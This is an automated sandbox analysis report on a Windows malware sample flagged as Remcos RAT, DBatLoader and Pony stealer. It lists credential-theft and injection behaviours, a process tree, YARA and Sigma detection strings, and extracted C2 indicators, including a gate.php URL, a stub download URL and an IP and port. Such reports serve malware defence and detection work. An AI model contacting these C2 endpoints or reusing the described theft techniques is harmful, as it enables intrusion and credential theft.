Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574872
MD5:21d13f2f3c4db8f083b672d81831fa5e
SHA1:b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0
SHA256:17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3
Tags:exeuser-jstrosch
Infos:

Detection

Remcos, DBatLoader, Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Pony
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to capture and log keystrokes
Contains functionality to detect virtual machines (IN, VMware)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Opens the same file many times (likely Sandbox evasion)
Pony trojan / infostealer detected
Sigma detected: Potentially Suspicious Malware Callback Communication
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 5968 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 4720 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 6536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5234062.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 432 cmdline: C:\Users\user\Desktop\file.exe MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
      • conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • file.exe (PID: 1076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
    • SGS.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\SGS.exe" MD5: 31B2F8C329A601B145E7E71A6D120A7B)
      • SGS.exe (PID: 6656 cmdline: C:\Users\user\AppData\Local\Temp\SGS.exe MD5: 31B2F8C329A601B145E7E71A6D120A7B)
        • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5249171.bat" "C:\Users\user\AppData\Local\Temp\SGS.exe" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • file.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 21D13F2F3C4DB8F083B672D81831FA5E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

Malware Configuration

Threatname: Pony

{"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\SGS.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x17d0:$a2: Mutex_RemWatchdog
            • 0x680:$a3: %02i:%02i:%02i:%03i
            • 0x6c4:$a3: %02i:%02i:%02i:%03i
            • 0x1bac:$a3: %02i:%02i:%02i:%03i
            00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
                • 0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                • 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
                • 0xdda:$s3: POST %s HTTP/1.0
                • 0xe03:$s4: Accept-Encoding: identity, *;q=0
                • 0xf10:$s4: Accept-Encoding: identity, *;q=0
                Click to see the 15 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                5.2.SGS.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  5.2.SGS.exe.400000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
                    5.2.SGS.exe.400000.0.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
                    • 0x1540c:$a1: \Global Downloader
                    • 0x14b95:$a2: wiseftpsrvs.bin
                    • 0x1526c:$a3: SiteServer %d\SFTP
                    • 0x15260:$a4: %s\Keychain
                    • 0x154ca:$a5: Connections.txt
                    • 0x15811:$a6: ftpshell.fsi
                    • 0x15f6c:$a7: inetcomm server passwords
                    5.2.SGS.exe.400000.0.unpackponyIdentify PonyBrian Wallace @botnet_hunter
                    • 0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                    • 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                    • 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
                    • 0x13bda:$s3: POST %s HTTP/1.0
                    • 0x13c03:$s4: Accept-Encoding: identity, *;q=0
                    • 0x13d10:$s4: Accept-Encoding: identity, *;q=0
                    5.2.SGS.exe.400000.0.unpackFareitFareit Payloadkevoreilly
                    • 0x16202:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
                    Click to see the 7 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Potentially Suspicious Malware Callback Communication
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 154.16.63.197, DestinationIsIpv6: false, DestinationPort: 3360, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 432, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 4084, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 432, TargetFilename: C:\Users\user\AppData\Roaming\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T17:57:34.496629+010020225501A Network Trojan was detected192.168.2.54970493.125.99.12180TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-13T17:57:38.174795+010028293081Malware Command and Control Activity Detected192.168.2.549705154.16.63.1973360TCP
                    2024-12-13T17:58:05.189475+010028293081Malware Command and Control Activity Detected192.168.2.549751154.16.63.1973360TCP
                    2024-12-13T17:58:32.236209+010028293081Malware Command and Control Activity Detected192.168.2.549815154.16.63.1973360TCP
                    2024-12-13T17:58:59.393580+010028293081Malware Command and Control Activity Detected192.168.2.549878154.16.63.1973360TCP
                    2024-12-13T17:59:26.877943+010028293081Malware Command and Control Activity Detected192.168.2.549942154.16.63.1973360TCP
                    2024-12-13T17:59:53.972078+010028293081Malware Command and Control Activity Detected192.168.2.549981154.16.63.1973360TCP
                    2024-12-13T18:00:21.020725+010028293081Malware Command and Control Activity Detected192.168.2.549982154.16.63.1973360TCP
                    2024-12-13T18:01:15.096357+010028293081Malware Command and Control Activity Detected192.168.2.549984154.16.63.1973360TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: file.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeAvira: detection malicious, Label: HEUR/AGEN.1331271
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeAvira: detection malicious, Label: HEUR/AGEN.1331271
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeAvira: detection malicious, Label: HEUR/AGEN.1331271
                    Found malware configuration
                    Source: 5.2.SGS.exe.400000.0.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://admino.ml/eme/gate.php", "http://admino.ml/eme/kachistub.exe"]}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeReversingLabs: Detection: 79%
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeReversingLabs: Detection: 73%
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 73%
                    Yara detected Pony
                    Source: Yara matchFile source: 5.2.SGS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SGS.exe PID: 4720, type: MEMORYSTR
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 11.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505205965.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505601069.00000000022FF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4505309464.00000000004F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 432, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: file.exe PID: 6000, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.2% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\scan[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,5_2_0040A712
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,5_2_0040D3BE
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,5_2_0040BC36
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040A557 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,5_2_0040A557
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,5_2_0040A96D
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,5_2_0040CE3D
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,5_2_0040AB24
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004043DC CryptUnprotectData,LocalFree,5_2_004043DC
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,5_2_004051E3
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_004041A6
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00404E73
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408AE5
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,5_2_00409832
                    Source: C:\Users\user\AppData\Local\Temp\SGS.exeCode function: 5_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,5_2_00408961
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00406920 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_00406920
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004065DB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004065DB
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_004031ED ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_004031ED
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_0040D9F4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040D9F4
